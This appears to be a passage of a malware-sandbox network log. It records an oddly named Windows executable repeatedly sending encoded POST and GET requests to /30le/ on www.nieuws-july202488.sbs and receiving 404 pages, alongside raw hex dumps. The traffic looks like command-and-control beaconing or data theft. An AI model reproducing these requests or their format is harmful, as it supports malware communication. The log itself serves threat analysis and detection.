                                                                        Nov 28, 2024 09:14:09.542239904 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                        Nov 28, 2024 09:14:09.542253017 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                        Nov 28, 2024 09:14:09.543045998 CET672INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                        Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                        Nov 28, 2024 09:14:09.551956892 CET858INData Raw: 45 cb f4 78 1b 51 16 89 46 67 d2 e3 b2 a1 6c 22 05 a5 1a 3a 39 57 b9 2d c8 7d 11 65 9a 5e aa 29 e1 8e e3 05 85 61 2c 3b ed f2 40 e4 14 25 0d 76 f6 64 17 69 72 2d 04 38 d3 92 b3 5d e5 ba cc 66 bc 3f f8 70 5b 9b a4 c1 c7 f8 ae 61 75 e5 04 db 30 d5
                                                                        Data Ascii: ExQFgl":9W-}e^)a,;@%vdir-8]f?p[au08jLzCf?=ne?z;+=~+Z7ZKE|?w>:a3c,X^/s@=T^+L}'_/=;?.


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549818162.0.215.33802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:10.903834105 CET843OUTPOST /30le/ HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.nieuws-july202488.sbs
                                                                        Referer: http://www.nieuws-july202488.sbs/30le/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 30 49 6a 52 7a 30 50 58 6d 2b 4d 6c 6c 35 73 5a 55 52 75 41 42 62 66 36 34 46 52 50 34 61 76 56 2f 73 4f 70 72 68 2b 41 43 33 64 55 6e 47 4e 45 2b 67 68 36 61 65 6e 4d 49 76 38 64 62 6f 31 32 52 4e 66 59 45 36 6b 75 70 34 49 59 74 5a 76 6e 69 44 52 6c 31 39 67 45 67 62 79 47 63 72 32 36 45 58 51 70 48 32 75 46 48 30 4c 61 6f 4e 34 4c 52 31 73 64 57 53 54 2f 67 77 6c 31 4f 76 77 34 46 42 74 64 79 48 65 43 4b 77 38 59 74 53 51 57 42 50 35 50 4a 76 30 30 54 68 56 73 48 4a 31 4a 32 74 72 67 6e 61 79 45 62 4c 49 39 53 7a 37 4d 52 2b
                                                                        Data Ascii: QhKxhNP=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz0IjRz0PXm+Mll5sZURuABbf64FRP4avV/sOprh+AC3dUnGNE+gh6aenMIv8dbo12RNfYE6kup4IYtZvniDRl19gEgbyGcr26EXQpH2uFH0LaoN4LR1sdWST/gwl1Ovw4FBtdyHeCKw8YtSQWBP5PJv00ThVsHJ1J2trgnayEbLI9Sz7MR+
                                                                        Nov 28, 2024 09:14:12.421308994 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 28 Nov 2024 08:14:12 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 35 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                        Data Ascii: 135CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                        Nov 28, 2024 09:14:12.421329975 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                        Nov 28, 2024 09:14:12.422353983 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                        Nov 28, 2024 09:14:12.422369957 CET1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                        Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                        Nov 28, 2024 09:14:12.422383070 CET289INData Raw: 88 e0 7d cc b3 d3 bd 5d 39 df 0d e0 9f 90 bf 12 ea fa 92 f9 13 59 ae d9 ff 14 ba 9f c1 ea 4f 2f b8 fa f3 a7 da b8 08 fc de 96 d7 3b 3e 0f ff 91 c6 80 3a df 29 e1 59 55 77 df 1e e1 cf 56 3d c2 1f 99 e7 06 50 1f f0 75 15 23 5e 59 7c 7c ae ed bd 57
                                                                        Data Ascii: }]9YO/;>:)YUwV=Pu#^Y||W/']0q_*v /3?!8Ss&(>`py<s$IO@LLYn~l 3=a:{/}c@1}`


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549825162.0.215.33802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:13.574978113 CET1860OUTPOST /30le/ HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.nieuws-july202488.sbs
                                                                        Referer: http://www.nieuws-july202488.sbs/30le/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 68 74 69 35 59 77 6f 46 75 6b 32 4c 38 66 58 47 73 53 32 39 79 75 31 31 50 54 4c 59 68 7a 38 49 67 69 4c 30 50 32 6d 2b 4e 6c 6c 35 71 70 55 63 75 41 42 47 66 36 77 42 52 50 45 73 76 58 33 73 50 4b 6a 68 79 6c 69 33 47 45 6e 47 53 55 2b 68 6c 36 61 78 6e 4e 34 52 38 64 4c 6f 31 32 52 4e 66 62 63 36 30 50 70 34 4f 59 74 65 6f 6e 69 50 56 6c 31 46 67 45 6f 6c 79 41 41 37 32 4b 6b 58 51 4a 58 32 39 6e 2f 30 55 4b 6f 31 37 4c 52 39 73 64 62 49 54 2f 73 43 6c 33 75 4a 77 36 6c 42 75 36 66 65 4f 52 53 79 6c 59 56 67 53 57 31 71 70 49 46 71 31 57 66 57 66 50 6a 64 35 34 4f 2f 74 31 54 33 77 57 47 46 4b 4a 71 61 36 4b 59 43 58 4c 38 39 67 50 69 52 6b 4d 58 2b 57 43 38 48 6d 76 4c 67 36 70 5a 32 66 66 71 53 72 6e 78 75 53 65 45 74 4f 73 79 31 56 34 55 64 2f 75 43 6d 79 41 7a 67 52 56 76 36 30 56 31 55 32 33 39 55 2b 61 78 74 4f 58 42 52 4a 59 55 46 56 46 4f 53 4e 74 71 57 6b 68 64 31 6a 77 49 39 6a 4a 44 33 77 58 4d 4b 6c 67 4a 53 2b 43 52 56 78 4c [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=uFsbYKxiJxYphti5YwoFuk2L8fXGsS29yu11PTLYhz8IgiL0P2m+Nll5qpUcuABGf6wBRPEsvX3sPKjhyli3GEnGSU+hl6axnN4R8dLo12RNfbc60Pp4OYteoniPVl1FgEolyAA72KkXQJX29n/0UKo17LR9sdbIT/sCl3uJw6lBu6feORSylYVgSW1qpIFq1WfWfPjd54O/t1T3wWGFKJqa6KYCXL89gPiRkMX+WC8HmvLg6pZ2ffqSrnxuSeEtOsy1V4Ud/uCmyAzgRVv60V1U239U+axtOXBRJYUFVFOSNtqWkhd1jwI9jJD3wXMKlgJS+CRVxLcYnQ3sHsj9oyijWcEVocXk8PTYhp+IvTK5V6Hg4g/iHKPLsBp6iuklC0S17DZtZQYkn7n8xxWwGrJu2yx8o272D0TB6HBe51EGLeLv1Elfu3f9MgdMeXnkENODKXuOzOgKGK9OWHAW6y+PmL8wBM0xEQ7NcNAiXQqPAKeICNY16IXoNUOno+AtaYD7mMqEC1a/z8abGTBaU16zyowwMOvEbX9EgETq3/5WiwMzpuGFR0DVhL0kbkJYBfU3nGjcxTTxj5Ngt9wYrhgLxeTW+0s0AtsVuQ6LDcQ0gPb24fBfJsq1XSuBgFoyjpQtEjesjogqd/CtD/0MgW0qWzsa2kR/BKevfSHmWNSIgCEBlh16C5lQi5Q8Oupt/8c5WCIuDQhXpGRBoapdwmkqz4wNIYUiAITdjbraLhPlDbXPSvxELthk6poaauCkRJdk+pZjhgpA/21M4BdlSpNKNW09k06AOsaHJoDY+vocEipHMlYO81ZCgYcA1zgSf6BkrFBW8dsUdrsoTd2K/qR2LJ+/7HXX+UF1m+6jP98TVuYnjNtf/Tno47vhXz9UlhMrDO2vkmYzL8CDB+oRDW0lDg9gWpy2I0uaK/f0SslQsvbzgPKe/IWEQfW2iusxX2mGnajtsw/5sfGEOxPU9Qn2oQKwye9Jd44EjPNg26hg [TRUNCATED]
                                                                        Nov 28, 2024 09:14:14.957858086 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        content-encoding: gzip
                                                                        vary: Accept-Encoding
                                                                        date: Thu, 28 Nov 2024 08:14:14 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef [TRUNCATED]
                                                                        Data Ascii: 1352ZrHr?OAa{7j$A$@$Hn85d.PRbKpD#+/3+~{'vU5o]~&neU~ycr:~z{YnTW=y)~}W>]- f>5YQ]MkCmea}i~NF @4S~|VeYbwE]vYg<{L0[ePiy_Eeexv(w0u7%0r8Fl~e_2Y0gO{8#rq'f~U_Y7p2M+`=L]hf/}"x+@d{^v#^K{jyYU]8j?DkYzlxg&Se^}UZ>Rx&#?_|A:6+)o92?I7d#8''@[YUeM^_WXBGWxGV^5\Y}q+|g|qW&0jDLFo^19_G5m{Z^b1/Vz 2xc7+w7;<[^G;\,ml[z7/hK901[3~{Yr@K~y?@q/I:d9oj0}^/5FF7?u`}s9C <.#ku~^O
                                                                        Nov 28, 2024 09:14:14.958009005 CET1236INData Raw: 09 94 c0 df cc f0 c6 cf df 12 d7 09 cd c1 9f 12 10 48 5f 0c 33 1e 91 79 f7 e7 9b 6d 6e 51 7b 33 dc 2b 2f cf ca 4b 86 7a 18 14 6e 0c 62 5d 73 e3 80 fd 9c 3e 62 01 ff 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab fc 74 41 f6 b3 5f bf 9f f7 c6 7e bf e2
                                                                        Data Ascii: H_3ymnQ{3+/Kznb]s>biA8nR?tA_~H?Wo(^"&WD{z?kq \A;g?T=P{?B`x!YkaQ7zl~sVusGo^EBn
                                                                        Nov 28, 2024 09:14:14.958020926 CET448INData Raw: 5d b8 2c f1 c9 02 16 8d 36 5c 76 9a e0 bb dc dc 4e 2c 49 9c d8 b6 a0 31 4e a7 bb 86 99 4e 73 75 26 d1 3a 2b 4e bb 16 b5 83 59 48 53 59 12 9d f1 8e c0 63 28 ad b7 7c b2 0d 22 b5 44 cc 91 31 36 84 8d 3b 1e 63 09 5a ed 63 9d e6 82 b9 38 89 46 69 bd
                                                                        Data Ascii: ],6\vN,I1NNsu&:+NYHSYc(|"D16;cZc8FiH<8\f:Bg|2Mcl9W9>.6->:qI#p3nXcn)5Hp8YAk5b\XKnHt91"PSN\F^9q-/ej"/!A)VE5V#j
                                                                        Nov 28, 2024 09:14:14.958543062 CET1236INData Raw: 91 d9 86 b3 e6 24 35 1c 8e 54 75 8e 2c e4 62 7d c0 aa 70 eb d9 d3 34 40 02 45 cc 0d 6e c3 1f 12 9a 72 31 6b 32 d4 f1 56 ea c2 2c e4 0a 2d c1 d2 3a 70 48 55 63 28 52 6c d7 1a b5 45 97 63 85 2a ad 8a 51 4e 92 e4 cf 72 08 85 45 b3 3b f2 94 76 2e a6
                                                                        Data Ascii: $5Tu,b}p4@Enr1k2V,-:pHUc(RlEc*QNrE;v.$5QL1rMRNs^-/zxYL9JoZ9]e9:h+8x2626 ~+KKD1g|&v/#QB.v<;N5\&${
                                                                        Nov 28, 2024 09:14:14.958558083 CET1082INData Raw: 87 4b d6 f0 84 ca a2 7c 84 2c 77 0f 12 a6 43 12 a3 e1 b8 55 0c 4f 26 f3 3d 6d 23 3e 34 9b 87 73 23 94 8b 49 41 34 e8 be 68 1c ab 32 cf 39 3a 5a af 98 a5 b7 cf 73 29 e4 d9 51 b8 39 16 d8 18 cd 36 59 a4 8f a8 d9 44 1f 4e f9 74 27 b6 ed 30 11 a0 68
                                                                        Data Ascii: K|,wCUO&=m#>4s#IA4h29:Zs)Q96YDNt'0h1}\0MXWP":J'&a\hBf.90Rey,dQ#!rq519;YQh07&|J0I!@MlHN2=FEl(HA


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549831162.0.215.33802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:16.226296902 CET551OUTGET /30le/?QhKxhNP=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+CHSERWGJqvHJseYAxerz13ZcR6Qaw8dlP7tGoG6xZXENiQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.nieuws-july202488.sbs
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:17.485291958 CET1236INHTTP/1.1 404 Not Found
                                                                        keep-alive: timeout=5, max=100
                                                                        content-type: text/html
                                                                        transfer-encoding: chunked
                                                                        date: Thu, 28 Nov 2024 08:14:17 GMT
                                                                        server: LiteSpeed
                                                                        x-turbo-charged-by: LiteSpeed
                                                                        connection: close
                                                                        Data Raw: 32 37 38 46 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                        Data Ascii: 278F<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                        Nov 28, 2024 09:14:17.485467911 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                        Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                        Nov 28, 2024 09:14:17.485481977 CET1236INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                        Nov 28, 2024 09:14:17.486135006 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                        Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                        Nov 28, 2024 09:14:17.486148119 CET1236INData Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                        Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                        Nov 28, 2024 09:14:17.486938953 CET1236INData Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a
                                                                        Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
                                                                        Nov 28, 2024 09:14:17.486984015 CET1236INData Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59
                                                                        Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
                                                                        Nov 28, 2024 09:14:17.487986088 CET1236INData Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20
                                                                        Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
